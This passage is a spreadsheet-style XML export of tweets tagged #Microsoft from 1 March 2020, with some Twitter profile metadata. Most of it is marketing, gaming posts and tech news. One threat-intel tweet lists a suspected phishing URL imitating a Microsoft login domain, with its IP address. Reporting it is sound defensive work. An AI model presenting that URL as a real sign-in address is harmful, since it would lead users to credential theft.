    <t>https://t.co/4d7vDf2UNV LIVE NOW!! Come join us on minecraft!! Would love to see you there!! #SupportSmallStreamers #twitchtv #twitchstreamer #twitchaffiliate #twitch #youtube #microsoft #minecraft #LiveNow #OnAir #PS4 #Multiplayer #fun #JoinNow #SmallStreamersCommunity</t>
  </si>
  <si>
    <t>Sun Mar 01 16:33:35 +0000 2020</t>
  </si>
  <si>
    <t>Cisco Webex Data Residency in EMEAR - Putting You Closer to Your Data and Applications https://t.co/VrjOHNSX1s
For more info: https://t.co/Px3Wx47SWG #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT https://t.co/JeEU8lmQz1</t>
  </si>
  <si>
    <t>Sun Mar 01 16:32:48 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Empowers Hong Kong Teachers and Students with Real-Time Interactive Remote Learning https://t.co/Cum2I3vq2v</t>
  </si>
  <si>
    <t>Sun Mar 01 16:30:19 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Security Baseline
#microsoft #ms #windows #win #winsrv #windowsserver #server #security #bezpecnost #baseline #nastaveni #deployment #grouppolicy #group #policy #local
https://t.co/rBMzymS4eg https://t.co/9hBofpAAw6</t>
  </si>
  <si>
    <t>{'id': 53672135, 'id_str': '53672135', 'name': 'Michal ZOBEC', 'screen_name': 'michalzobec', 'location': 'Czech Republic, Praha', 'description': 'Czech independent Senior IT Consultant from @zobecconsulting. IT Blog https://t.co/9EnzeBXncF, Virtualization blog https://t.co/NGDyljw7kQ', 'url': 'http://t.co/fjVvwzJtUQ', 'entities': {'url': {'urls': [{'url': 'http://t.co/fjVvwzJtUQ', 'expanded_url': 'http://www.michalzobec.cz', 'display_url': 'michalzobec.cz', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/9EnzeBXncF', 'expanded_url': 'http://zob.ec/blog', 'display_url': 'zob.ec/blog', 'indices': [70, 93]}, {'url': 'https://t.co/NGDyljw7kQ', 'expanded_url': 'http://zob.ec/vpc', 'display_url': 'zob.ec/vpc', 'indices': [115, 138]}]}}, 'protected': False, 'followers_count': 190, 'friends_count': 691, 'listed_count': 13, 'created_at': 'Sat Jul 04 13:48:05 +0000 2009', 'favourites_count': 946, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3931,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'http://pbs.twimg.com/profile_images/3722509082/ae8822f246c58f79c330b7c4a961512b_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3722509082/ae8822f246c58f79c330b7c4a961512b_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/53672135/1464349224',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</si>
  <si>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Sun Mar 01 16:30:03 +0000 2020</t>
  </si>
  <si>
    <t>At Microsoft our employees are our greatest asset. Here's how were investing in #technology and #culture to #transform their experience.  #Microsoft #Microsoft365 https://t.co/y2rlvAbcDo</t>
  </si>
  <si>
    <t>Sun Mar 01 16:28:30 +0000 2020</t>
  </si>
  <si>
    <t>Whoever invented the thing where you have to pay extra to get shit on computer games is an actual wanker. Such a pain in the arse having to constantly explain to my autistic lad that he doesnt need packs/credits/skins. Fuck you #PlayStation #Microsoft #steam</t>
  </si>
  <si>
    <t>{'id': 18871006, 'id_str': '18871006', 'name': 'Lee Francis', 'screen_name': 'LeeFrancis', 'location': 'Warwickshire', 'description': 'I can just about tolerate the general public.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 864, 'friends_count': 581, 'listed_count': 10, 'created_at': 'Sun Jan 11 16:21:29 +0000 2009', 'favourites_count': 20948, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 44903,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'http://pbs.twimg.com/profile_images/716924727214866432/e2rIxw5v_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/716924727214866432/e2rIxw5v_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18871006/1485227113', 'profile_link_color': 'CC3366', 'profile_sidebar_border_color': 'DBE9ED', 'profile_sidebar_fill_color': 'E6F6F9', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 16:26:39 +0000 2020</t>
  </si>
  <si>
    <t>@Ult_WirelessEnt has been accepted to attend @e3expo for the 10th straight year! Proud #e3 Alumni https://t.co/oZFODewqc7 . #e32020 #e3expo ##e3expo2020 #gamer #gamers #nintendo #microsoft #xboxone #switch #nintendoswitch #ultimatewireless https://t.co/R6E7BUGoH6</t>
  </si>
  <si>
    <t>{'id': 1723527457, 'id_str': '1723527457', 'name': 'Ultimate WirelessENT', 'screen_name': 'Ult_WirelessEnt', 'location': 'NJ', 'description': 'Great events for a good cause,Charity events,concerts,comedy shows. To book Bern Nadette Stanis Thelma from Good Times visit our page or call (310) 486-4988', 'url': 'https://t.co/NiCgnvGuQf', 'entities': {'url': {'urls': [{'url': 'https://t.co/NiCgnvGuQf', 'expanded_url': 'http://www.events-ultimate-wireless.com', 'display_url': 'events-ultimate-wireless.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 129, 'friends_count': 296, 'listed_count': 1, 'created_at': 'Mon Sep 02 21:19:54 +0000 2013', 'favourites_count': 708, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 461,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'http://pbs.twimg.com/profile_images/378800000402234868/262946380abc2c8f4fe1074530c7291d_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000402234868/262946380abc2c8f4fe1074530c7291d_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1723527457/1399731817',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</si>
  <si>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Sun Mar 01 16:25:08 +0000 2020</t>
  </si>
  <si>
    <t>Just flexing on this poor souls. Be sure to follow my https://t.co/WJ4XNRUU94
#ApexLegends #BattleRoyale #gamers #Microsoft #xboxone 
#xbox #ps4 #pc #apexclips https://t.co/o5o4zHf3UO</t>
  </si>
  <si>
    <t>Sun Mar 01 16:23:07 +0000 2020</t>
  </si>
  <si>
    <t>40% of #websites on the #internet are vulnerable to #DoS attacks.
#Amazon, #Apache, #Apple, #Facebook, #Microsoft, #nginx, #Node.js, #Ubuntu may be affected. #cyberaware #cybersecurity https://t.co/1aIaADrRzH</t>
  </si>
  <si>
    <t>{'id': 110359156, 'id_str': '110359156', 'name': 'Leverage Your Business Online', 'screen_name': 'LYBObiz', 'location': 'United States', 'description': 'Websites &amp; Hosting, Domains, Emails, Marketing, Security. #digitalmarketing #webdev #graphicdesign #entrepreneur #onlinebusiness #ecommerce Call Us 480-624-2500', 'url': 'https://t.co/7LYIRPQFVT', 'entities': {'url': {'urls': [{'url': 'https://t.co/7LYIRPQFVT', 'expanded_url': 'https://www.lybo.biz', 'display_url': 'lybo.biz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2467, 'friends_count': 1986, 'listed_count': 525, 'created_at': 'Mon Feb 01 07:50:47 +0000 2010', 'favourites_count': 8070, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13228,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'http://pbs.twimg.com/profile_images/1118546106756079617/Wr_RGp0A_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118546106756079617/Wr_RGp0A_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/110359156/1564112744',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</si>
  <si>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16:22:15 +0000 2020</t>
  </si>
  <si>
    <t>Multi-Company Superpowers for Management Firms - Gravity Software https://t.co/tPdiBo2X3D by @vsilvani
#SundayMorning #FeelGood #app @GoGravityOnline #Cloud #Multi-Company #Accounting #Software #consolidating #FinancialReports #Franchisees #Microsoft #PowerBI #Insights #MonthEnd https://t.co/lDQ1o4UPzT</t>
  </si>
  <si>
    <t>Sun Mar 01 16:19:06 +0000 2020</t>
  </si>
  <si>
    <t>Announcing New Storage Options for Azure Cloud Shell
- additional regions for persistent Cloud Shell storage
https://t.co/iteDwMef6c
#Azure #Microsoft #Cloud #Storage #CloudShell https://t.co/cLUxezEWfi</t>
  </si>
  <si>
    <t>Sun Mar 01 16:01:22 +0000 2020</t>
  </si>
  <si>
    <t>No Sunday scares over here when you know your going into the week in style with our Skinny Sleeve! 
.
.
.
#SkinnySleeve #LaptopSleeve #TabletSleeve #Apple #Microsoft #Macbook #SurfacePro #AcmeMade https://t.co/PTVwhmd5lS</t>
  </si>
  <si>
    <t>Sun Mar 01 16:00:30 +0000 2020</t>
  </si>
  <si>
    <t>Sharegate is a great tool for migrations.  But without correct preparation can produce a migration with issues.....Have a 30-minute call with an expert:
https://t.co/P4C06ptcRC
#sharegate #sharepoint #office365 #microsoft #collab365 #microjobs #futureofwork #gigeconomy</t>
  </si>
  <si>
    <t>{'id': 1178261179, 'id_str': '1178261179', 'name': 'Collab365 Today #globalcon1', 'screen_name': 'SharePointPart', 'location': 'United Kingdom', 'description': 'This site is a social network that has been built to serve the needs of the SharePoint, Office365 and Azure community.', 'url': 'https://t.co/mPO03hjbWu', 'entities': {'url': {'urls': [{'url': 'https://t.co/mPO03hjbWu', 'expanded_url': 'https://collab365.community', 'display_url': 'collab365.community', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4720, 'friends_count': 578, 'listed_count': 161, 'created_at': 'Thu Feb 14 09:12:42 +0000 2013', 'favourites_count': 610, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8875,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'http://pbs.twimg.com/profile_images/855051848419389440/xG1-J-Qq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/855051848419389440/xG1-J-Qq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1178261179/1562517249',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</si>
  <si>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15:56:31 +0000 2020</t>
  </si>
  <si>
    <t>These well aged #Atari Mega STe keyboard and #Microsoft optical wheelmouse fit perfectly together :) #AtariSunday https://t.co/kx0KVlvZGI</t>
  </si>
  <si>
    <t>{'id': 301964794, 'id_str': '301964794', 'name': 'Atari MegaSTe', 'screen_name': 'Atari_MegaSTe', 'location': 'Mal da mal hier', 'description': '#Atari #Chaosdorf. #IrgendwasMitIT, #cycling, #lastenrad, #refugesswelcome #NoNazisEverywhere, #teamrosenkohl #de|en|nl', 'url': 'https://t.co/9RSyrJvY8k', 'entities': {'url': {'urls': [{'url': 'https://t.co/9RSyrJvY8k', 'expanded_url': 'http://theragnarbay.org', 'display_url': 'theragnarbay.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 616, 'friends_count': 1142, 'listed_count': 39, 'created_at': 'Fri May 20 11:14:34 +0000 2011', 'favourites_count': 4051, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 27715,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'http://pbs.twimg.com/profile_images/820036148420546560/Q5pr2fY1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/820036148420546560/Q5pr2fY1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/301964794/1483367967',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</si>
  <si>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Sun Mar 01 15:54:24 +0000 2020</t>
  </si>
  <si>
    <t>Ready to improve with EOS? 8 tips for getting started - Gravity Software https://t.co/xpc0Pivutx by @GoGravityOnline
#AccountingNews #BusinessApps #CRMOnline #MultiEntity #CloudFinancials  #Accounting #Franchisees #Business #Software #Microsoft #CRM #Dyn365 #CustomerEngagement https://t.co/KXSnqr7QkV</t>
  </si>
  <si>
    <t>Sun Mar 01 15:45:13 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Office 2019 Server: Blend of Positives and Limitations https://t.co/k8sgP2dYVL #cloud</t>
  </si>
  <si>
    <t>Sun Mar 01 15:42:03 +0000 2020</t>
  </si>
  <si>
    <t>The #blackduck types (or #microsoft buddies) brought their anti-FOSS venom to #RSA https://t.co/3nBw7BjS2g see https://t.co/pSOjnNy79K</t>
  </si>
  <si>
    <t>Sun Mar 01 15:39:24 +0000 2020</t>
  </si>
  <si>
    <t>KQL cheat sheets - Quick Reference official page https://t.co/YDZr612eVD #Microsoft</t>
  </si>
  <si>
    <t>Sun Mar 01 15:33:22 +0000 2020</t>
  </si>
  <si>
    <t>Digital transformation is enabling #healthcare professionals to be more productive while better engaging patients. Get key strategies and read real-world examples with this infographic: https://t.co/U8JCrdLnSz https://t.co/bw3ahq3LP6 #Microsoft</t>
  </si>
  <si>
    <t>Sun Mar 01 15:30:01 +0000 2020</t>
  </si>
  <si>
    <t>Working as a #journalist in Nigeria was, and continues to be, a risky occupation - @Olurounbi Kelechukwu Iruoma #Nigeria #Abuja #Microsoft #ICFJ #Oil https://t.co/uKtNHLXHYa #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sun Mar 01 15:27:02 +0000 2020</t>
  </si>
  <si>
    <t>"AI ethics backed by Pope and tech giants in new plan"
The #Vatican has had a growing interest in addressing moral issues in #technology and they decided to team with #IBM and #Microsoft to tackle the ethics of #ArtificialIntelligence. 
https://t.co/VCQfTbfmJV via @BBCNews https://t.co/OFJ73uEfrk</t>
  </si>
  <si>
    <t>{'id': 3232879200, 'id_str': '3232879200', 'name': 'AXEL', 'screen_name': 'AXELUnlimited', 'location': 'Las Vegas, NV', 'description': 'Real products that solve real problems achieve real adoption.\nJoin the distributed technology revolution on our Telegram https://t.co/KH8u9G9xoS', 'url': 'https://t.co/hVvCI0qQ2O', 'entities': {'url': {'urls': [{'url': 'https://t.co/hVvCI0qQ2O', 'expanded_url': 'http://www.axel.org', 'display_url': 'axel.org', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/KH8u9G9xoS', 'expanded_url': 'https://t.me/axelnetwork', 'display_url': 't.me/axelnetwork', 'indices': [121, 144]}]}}, 'protected': False, 'followers_count': 32230, 'friends_count': 2935, 'listed_count': 199, 'created_at': 'Mon Jun 01 21:54:19 +0000 2015', 'favourites_count': 2472, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15071,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'http://pbs.twimg.com/profile_images/1224473182075121664/J_CTlWRN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224473182075121664/J_CTlWRN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3232879200/1576543626',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</si>
  <si>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15:26:41 +0000 2020</t>
  </si>
  <si>
    <t>@Azure Exam AZ-500 Tip:
#Microsoft #microsoftazure #Azure #linkedinlearning
https://t.co/mSsmS0NMC9</t>
  </si>
  <si>
    <t>Sun Mar 01 15:21:25 +0000 2020</t>
  </si>
  <si>
    <t>We get it.
In our modern society, it seems that everyone is glued to their smartphone, and it's not hard to see why!
Every day, we'll keep you updated with the latest #TechNews, from @Infor's #Lawson to the latest #Microsoft update.
Follow us on your favorite social platform! https://t.co/7r3uGokL8r</t>
  </si>
  <si>
    <t>{'id': 90956043, 'id_str': '90956043', 'name': 'CENDIEN', 'screen_name': 'cendien', 'location': 'DALLAS, TX', 'description': 'Cendien is an innovative consulting firm that delivers the highest quality consultants and best customer experience.', 'url': 'http://t.co/V1rlJWOqYf', 'entities': {'url': {'urls': [{'url': 'http://t.co/V1rlJWOqYf', 'expanded_url': 'http://www.cendien.com', 'display_url': 'cendien.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 58, 'friends_count': 10, 'listed_count': 2, 'created_at': 'Wed Nov 18 20:53:30 +0000 2009', 'favourites_count': 35, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1225, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EDF5FB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1163563634737471489/PaR7YNPa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1163563634737471489/PaR7YNPa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/90956043/1396903429', 'profile_link_color': '0060CB',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</si>
  <si>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Sun Mar 01 15:20:03 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 15:19:10 +0000 2020</t>
  </si>
  <si>
    <t>The virgin microsoft exclusive Vs the Chad Ps4 exclusive
@TruGiffer @BoxDone @Morning_Starr6
#xbox #PS4 #Sony #Microsoft #XboxSeriesX #PS5 #ps4exclusive #xboxexclusive https://t.co/72E8u5PyAI</t>
  </si>
  <si>
    <t>{'id': 1206284735217053697, 'id_str': '1206284735217053697', 'name': 'Galak', 'screen_name': 'Glaak4', 'location': 'Italia', 'description': "don't follow me, i use Twitter just for gaming news", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 17, 'friends_count': 49, 'listed_count': 0, 'created_at': 'Sun Dec 15 18:48:18 +0000 2019', 'favourites_count': 4191, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1187, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1219323905208389633/eBLKTNts_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219323905208389633/eBLKTNts_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1206284735217053697/1583324440',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</si>
  <si>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15:17:01 +0000 2020</t>
  </si>
  <si>
    <t>Hiding #Windows File Extensions is a #Security Risk, Enable Now https://t.co/XYIJKYgCde #informedsecurity #Microsoft https://t.co/5SAJiRo7Zg</t>
  </si>
  <si>
    <t>Sun Mar 01 15:14:26 +0000 2020</t>
  </si>
  <si>
    <t>"Windows 10 Updates: Home Users Are Baffled" https://t.co/YUtStyjPVY #Microsoft #Windows10 https://t.co/gULEqn0ZA3</t>
  </si>
  <si>
    <t>Sun Mar 01 15:10:47 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft #Azure Certification Changes Coming Early 2020
 #AzureAdministrator #AzureDeveloper #microsoftcertified #MicrosoftLearning #Microsoft
https://t.co/4rFhS6hBHB</t>
  </si>
  <si>
    <t>Sun Mar 01 15:10:09 +0000 2020</t>
  </si>
  <si>
    <t>#News #Computing #Microsoft Surface Duo: Everything you need to know about Microsofts dual-screen phone https://t.co/fyV34GL5ux https://t.co/qHRXbQkR2E</t>
  </si>
  <si>
    <t>Sun Mar 01 15:10:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft cancels #GDC2020 presence due to #coronavirus concerns https://t.co/YIa8fbXzje via @salromano @gematsucom</t>
  </si>
  <si>
    <t>Sun Mar 01 15:06:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #support become very bad now a days ! If you open case today they will have someone assigned in 2 to 3 days ! @Office365 @MicrosoftHelps</t>
  </si>
  <si>
    <t>{'id': 1136000947023425536, 'id_str': '1136000947023425536', 'name': 'Yogi Lohani', 'screen_name': 'imYogilohani', 'location': 'London, England', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 97, 'listed_count': 0, 'created_at': 'Tue Jun 04 20:05:06 +0000 2019', 'favourites_count': 115, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 148, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1136001217732239361/z9WYaZAJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1136001217732239361/z9WYaZAJ_normal.jpg',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</si>
  <si>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15:03:08 +0000 2020</t>
  </si>
  <si>
    <t>Audis E-Tron S Shows Electric Can Be Fun
#tech #gadgets #hitech #audi #etron #britishairways #cortana  #microsoft #EV https://t.co/ChLUMQAocZ</t>
  </si>
  <si>
    <t>{'id': 1211184874679230464, 'id_str': '1211184874679230464', 'name': 'Geek It', 'screen_name': 'Geek_It_NEWS', 'location': '', 'description': "We're bringing the daily news on all that's happening in the Tech and Gadget world.\nUPDATE: Still no robot butlers.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 140, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Sun Dec 29 07:19:21 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1211675460456857600/1jEJuTnH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211675460456857600/1jEJuTnH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1211184874679230464/1577720917',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</si>
  <si>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15:01:18 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #msdyn365     Don't be fooled. Cloud &amp;amp; on-premise ERP solutions might look identical, yet there are often costs below the surface. This free TCO Iceberg Infographic explains:    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/HWyfOaSWnc</t>
  </si>
  <si>
    <t>Sun Mar 01 15:01:11 +0000 2020</t>
  </si>
  <si>
    <t>Listen to our Azure expert discuss all things Azure. From benefits to technologies, from platform to services azure has it all. Have you tried it?
https://t.co/Tc370ulAML 
#azure #cloud #technology #microsoft #transformation https://t.co/Vy2P9gXdkz</t>
  </si>
  <si>
    <t>Sun Mar 01 15:00:21 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's unified #Office #app launches on #iOS and yes, it has dark mode.  Mashable https://t.co/nspfsxX4LV</t>
  </si>
  <si>
    <t>{'id': 239949555, 'id_str': '239949555', 'name': 'Seeforth Design', 'screen_name': 'seeforthdesigns', 'location': '563.650.8115', 'description': 'SEO mobile friendly websites, logos, animated videos, social media. Artistic passion  &amp; technology taking business to the next level  http://t.co/8faa7zfwNT', 'url': 'https://t.co/zne1slhf6l', 'entities': {'url': {'urls': [{'url': 'https://t.co/zne1slhf6l', 'expanded_url': 'http://seeforthdesigns.com', 'display_url': 'seeforthdesigns.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'http://t.co/8faa7zfwNT', 'expanded_url': 'http://www.facebook.com/seeforthdesign', 'display_url': 'facebook.com/seeforthdesign', 'indices': [134, 156]}]}}, 'protected': False, 'followers_count': 1056, 'friends_count': 2014, 'listed_count': 44, 'created_at': 'Tue Jan 18 20:26:49 +0000 2011', 'favourites_count': 42, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2697, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '131516', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1541260549/beauty_logo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1541260549/beauty_logo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/239949555/1557866005', 'profile_link_color': '009999', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '7AC3EE', 'profile_text_color': '3D1957', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 15:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Learn why multi-factor authentication is a top priority today for organizations, and what #authentication factors are most commonly used. #Microsoft #MFA #Azure https://t.co/O3wzuvXCup #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sun Mar 01 15:00:03 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone #Azure #Microsoft https://t.co/vOwwYAGGOF</t>
  </si>
  <si>
    <t>Sun Mar 01 14:59:53 +0000 2020</t>
  </si>
  <si>
    <t>Micah Lee failed already. He outsourced to #ProprietarySoftware #github despite writing about #microsoft back doors. 
 https://t.co/7kgyrfG4gt</t>
  </si>
  <si>
    <t>Sun Mar 01 14:56:54 +0000 2020</t>
  </si>
  <si>
    <t>We're rearchitecting everything at Microsoft now that we're fully in the #cloud. #transformation #Azure #Microsoft https://t.co/qZWvOnOm9b</t>
  </si>
  <si>
    <t>{'id': 7888762, 'id_str': '7888762', 'name': 'Frank La Vigne', 'screen_name': 'Tableteer', 'location': 'Washington, DC', 'description': '#DataScientist, #DataEngineer, Blogger, Vlogger, Podcaster at https://t.co/z6eq62Cq7y. Back @Microsoft to help customers leverage #AI. Opinions mine. #äººå·¥æ™ºèƒ½ #æ­¦ç•¶æ´¾', 'url': 'https://t.co/c4BUIBzg1o', 'entities': {'url': {'urls': [{'url': 'https://t.co/c4BUIBzg1o', 'expanded_url': 'http://www.franksworld.com', 'display_url': 'franksworld.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/z6eq62Cq7y', 'expanded_url': 'http://DataDriven.tv', 'display_url': 'DataDriven.tv', 'indices': [62, 85]}]}}, 'protected': False, 'followers_count': 4692, 'friends_count': 5154, 'listed_count': 2277, 'created_at': 'Wed Aug 01 19:08:24 +0000 2007', 'favourites_count': 28424, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 71355,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'http://pbs.twimg.com/profile_images/843868850156437510/pETURWjP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/843868850156437510/pETURWjP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/7888762/1571089063', 'profile_link_color': 'FA743E',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</si>
  <si>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Sun Mar 01 14:52:31 +0000 2020</t>
  </si>
  <si>
    <t>.@Gartner_inc has named #Microsoft a Magic Quadrant Leader among analytics and BI platforms for the thirteenth year in a row. #PowerBI https://t.co/zA73obzZcY</t>
  </si>
  <si>
    <t>Sun Mar 01 14:49:14 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft proxy from Microsoft employee https://t.co/xKvGnYOvlC see https://t.co/0vbOwDK720</t>
  </si>
  <si>
    <t>Sun Mar 01 14:45:45 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> https://login-microsoftonline-com-common-oauth2.isnrs.casacam.net
Suspected #phishing #opendir
AS57043 [146.0.76.90]
Let's Encrypt Authority X3
Keywords: #login #online #microsoft
https://t.co/eRMBuJ8mdA</t>
  </si>
  <si>
    <t>Sun Mar 01 14:44:55 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft set to launch its #antivirus #software on #iOS and #Android https://t.co/XQwnhXuqmV</t>
  </si>
  <si>
    <t>Sun Mar 01 14:43:55 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #propaganda site #motleyfool (check owner!) incites the public against #amazon 
This helps distract from #microsoft crimes 
https://t.co/Qur8wpIHlH</t>
  </si>
  <si>
    <t>Sun Mar 01 14:43:11 +0000 2020</t>
  </si>
  <si>
    <t>Can or should paths to text log files on various machines be stored in ldap?
#activedirectory #windows #ldap #microsoft
https://t.co/L7BC9ytD7A</t>
  </si>
  <si>
    <t>{'id': 14246382, 'id_str': '14246382', 'name': 'leeand00', 'screen_name': 'leeand00', 'location': 'Harrisburg, PA', 'description': '', 'url': 'http://t.co/vID2IYhi7C', 'entities': {'url': {'urls': [{'url': 'http://t.co/vID2IYhi7C', 'expanded_url': 'http://leeand00.tiddlyspot.com', 'display_url': 'leeand00.tiddlyspot.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 508, 'friends_count': 1272, 'listed_count': 57, 'created_at': 'Fri Mar 28 19:45:27 +0000 2008', 'favourites_count': 936, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11006,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'http://pbs.twimg.com/profile_images/1133841067/OldTwitPic_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1133841067/OldTwitPic_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14246382/1506445434',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</si>
  <si>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Sun Mar 01 14:41:22 +0000 2020</t>
  </si>
  <si>
    <t>SMBs are hungry for #tech that brings customer data together and helps drive #DigitalTransformation. More, via @smbgroup    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/eSJFINjwyy</t>
  </si>
  <si>
    <t>Sun Mar 01 14:39:54 +0000 2020</t>
  </si>
  <si>
    <t>"...while not every tech business has the scope of #Microsoft, there are seven dimensions of #AI that all companies in the field should recognize and explore in order to achieve the same-targeted levels of power, #ethics, and trust: https://t.co/MZUI7c40yn</t>
  </si>
  <si>
    <t>Sun Mar 01 14:39:17 +0000 2020</t>
  </si>
  <si>
    <t>10 Time Management Tips for Accountants | Gravity Software https://t.co/jRcmQAaFk6 by @vsilvani
#Microsoft #CRM #QuickBooksEnterprise #Cloud #Accounting #Inventory #Purchasing #MultiSite #Financials #OutsourcedCFOs #FranchiseIndustry #CFOs #Accountants #Bookkeepers #ProAdvisor https://t.co/gD8GjaI7Mj</t>
  </si>
  <si>
    <t>Sun Mar 01 14:38:49 +0000 2020</t>
  </si>
  <si>
    <t>#VisualStudioCode and #Azure, working together to simplifying and improving the overall developer experience of building, debugging and deploying Node.js applications.
#Coding #WebsiteBuilding #WebsiteDevelopment #Microsoft #Cloud #CloudComputing 
